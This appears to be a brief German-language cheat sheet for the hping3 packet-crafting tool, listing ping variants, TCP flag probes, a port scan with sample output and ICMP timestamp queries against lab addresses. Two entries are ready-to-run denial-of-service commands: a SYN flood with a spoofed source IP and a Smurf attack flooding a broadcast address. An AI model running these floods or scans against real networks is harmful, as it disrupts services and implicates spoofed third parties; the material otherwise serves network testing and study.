Install

• apt-get install hping3

PING auf port 0

• hping3 10.0.10.104

SYN Ping

• hping3 10.0.10.104 -S -p 80 -w 2000 -d 1500 --fast

SYN tcp flag: -S
Port 80: -p 80 
TCP Window: -w 2000 
Data Size: -d 1500
10Packets/s: --fast

SYN PUSH Ping

• hping3 10.0.10.104 -S -P -p 80

Push Flag: -P

ACK Ping

• hping3 10.0.10.104 -A -p 80

ACK Flag: -A

Scan

• hping3 -8 1-1000 -S 10.0.10.104

Scanning 192.168.1.1 (192.168.1.1), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp        : .S..A...  64     0 29200    44
   22 ssh        : .S..A...  64     0 29200    44
   80 http       : .S..A...  64     0 29200    44
  139 netbios-ssn: .S..A...  64     0 29200    44
  389 ldap       : .S..A...  64     0 29200    44
  443 https      : .S..A...  64     0 29200    44
  445 microsoft-d: .S..A...  64     0 29200    44
  636 ldaps      : .S..A...  64     0 29200    44
All replies received. Done.
Not responding ports:

SYN Flooding gespoofte IP

• hping3 -a 10.0.10.103 -S 10.0.10.104 -p 21 --flood

Spoof IP: -a

Smurf Attacke

• hping3 -1 -a 10.0.10.104 -S 10.0.10.255 --flood

timestamp

• hping3 -1 dumm-host --icmp-ts -c 1

HPING dumm-host (eth0 192.168.244.156): icmp mode set, 28 headers + 0 data bytes
len=40 ip=192.168.244.156 ttl=64 id=15600 icmp_seq=0 rtt=7.9 ms
ICMP timestamp: Originate=62740839 Receive=62740835 Transmit=62740835
ICMP timestamp RTT tsrtt=8


--- dumm-host hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 7.9/7.9/7.9 ms

Port 50 aufsteigend

• hping3 -S -p ++50 dumm-host

ICMP Timestamp Request Remote Date Disclosure

• hping3 -1 --icmp-ts -c 1 10.0.10.103

Hacks

• Packet Injection

Links

• https://diarium.usal.es/pmgallardo/2020/10/16/hping3-syntax/